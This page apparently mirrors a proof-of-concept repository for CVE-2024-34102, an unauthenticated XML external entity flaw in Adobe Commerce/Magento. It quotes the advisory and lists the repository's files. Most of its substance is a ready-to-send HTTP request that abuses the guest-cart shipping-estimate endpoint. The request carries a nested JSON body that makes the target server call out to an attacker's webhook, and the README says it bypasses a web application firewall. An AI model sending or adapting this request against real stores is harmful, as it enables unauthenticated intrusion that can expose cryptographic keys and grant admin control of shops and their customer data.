CVE-2024-34102 PoC — XXE can expose crypt key and other secrets granting full admin access

Source

https://github.com/11whoami99/CVE-2024-34102

Associated Vulnerability

Title:XXE can expose crypt key and other secrets granting full admin access (CVE-2024-34102)
Description:Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.

Readme

# CVE-2024-34102

POC for CVE-2024-34102 : Unauthenticated Magento XXE and bypassing WAF , You will get http connection on ur webhook

```
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Host: example.com
Accept:  application/json, text/javascript, */*; q=0.01
Content-Length: 310
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

{
  "address": {
    "totalsCollector": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "http://YOUR-webhook",
            "dataIsURL": true,
            "options": 1337
          }
        }
      }
    }
  }
}
```

File Snapshot


 [4.0K]  /data/pocs/549a8b7f633d11bf575c49f6e3afdbcec39addcd
├── [ 725]  README.md
└── [ 151]  xxe.xml

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!